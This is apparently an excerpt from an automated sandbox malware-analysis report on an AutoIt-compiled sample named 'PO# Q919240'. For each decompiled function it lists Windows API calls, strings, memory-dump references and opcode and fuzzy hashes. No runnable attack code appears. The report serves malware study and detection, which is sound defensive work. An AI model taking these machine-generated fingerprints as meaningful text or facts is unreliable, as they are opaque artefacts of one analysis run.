                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                • __init_pointers.LIBCMT ref: 00417CE6
                • __calloc_crt.LIBCMT ref: 00417D54
                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 4163708885-3819984048
                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: >>>AUTOIT SCRIPT<<<$\
                • API String ID: 0-1896584978
                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2485277191-404129466
                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                Download Yara Rule
                APIs
                • LoadIconW.USER32(?,00000063), ref: 0045464C
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                • SetWindowTextW.USER32(?,?), ref: 00454678
                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                • GetWindowRect.USER32(?,?), ref: 004546F5
                • SetWindowTextW.USER32(?,?), ref: 00454765
                • GetDesktopWindow.USER32 ref: 0045476F
                • GetWindowRect.USER32(00000000), ref: 00454776
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                • GetClientRect.USER32(?,?), ref: 004547D2
                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                • String ID:
                • API String ID: 3869813825-0
                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 00464B28
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                • _wcslen.LIBCMT ref: 00464C28
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                • _wcslen.LIBCMT ref: 00464CBA
                • _wcslen.LIBCMT ref: 00464CD0
                • _wcslen.LIBCMT ref: 00464CEF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$Directory$CurrentSystem
                • String ID: D
                • API String ID: 1914653954-2746444292
                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                Download Yara Rule
                APIs
                • _wcsncpy.LIBCMT ref: 0045CE39
                • __wsplitpath.LIBCMT ref: 0045CE78
                • _wcscat.LIBCMT ref: 0045CE8B
                • _wcscat.LIBCMT ref: 0045CE9E
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                • _wcscpy.LIBCMT ref: 0045CF61
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                • String ID: *.*
                • API String ID: 1153243558-438819550
                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll
                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                • API String ID: 3832890014-4202584635
                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                • GetFocus.USER32 ref: 0046A0DD
                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$CtrlFocus
                • String ID: 0
                • API String ID: 1534620443-4108050209
                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(?), ref: 004558E3
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$CreateDestroy
                • String ID: ,$tooltips_class32
                • API String ID: 1109047481-3856767331
                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                • GetMenuItemCount.USER32(?), ref: 00468C45
                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                • GetMenuItemCount.USER32 ref: 00468CFD
                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                • GetCursorPos.USER32(?), ref: 00468D3F
                • SetForegroundWindow.USER32(?), ref: 00468D49
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                • String ID: 0
                • API String ID: 1441871840-4108050209
                • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                • __swprintf.LIBCMT ref: 00460915
                • __swprintf.LIBCMT ref: 0046092D
                • _wprintf.LIBCMT ref: 004609E1
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                • API String ID: 3631882475-2268648507
                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                Download Yara Rule
                APIs
                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                • SendMessageW.USER32 ref: 00471740
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                • SendMessageW.USER32 ref: 0047184F
                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                • String ID:
                • API String ID: 4116747274-0
                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                Download Yara Rule
                APIs
                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                • _wcslen.LIBCMT ref: 00461683
                • __swprintf.LIBCMT ref: 00461721
                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                • GetDlgCtrlID.USER32(?), ref: 00461869
                • GetWindowRect.USER32(?,?), ref: 004618A4
                • GetParent.USER32(?), ref: 004618C3
                • ScreenToClient.USER32(00000000), ref: 004618CA
                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                • String ID: %s%u
                • API String ID: 1899580136-679674701
                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
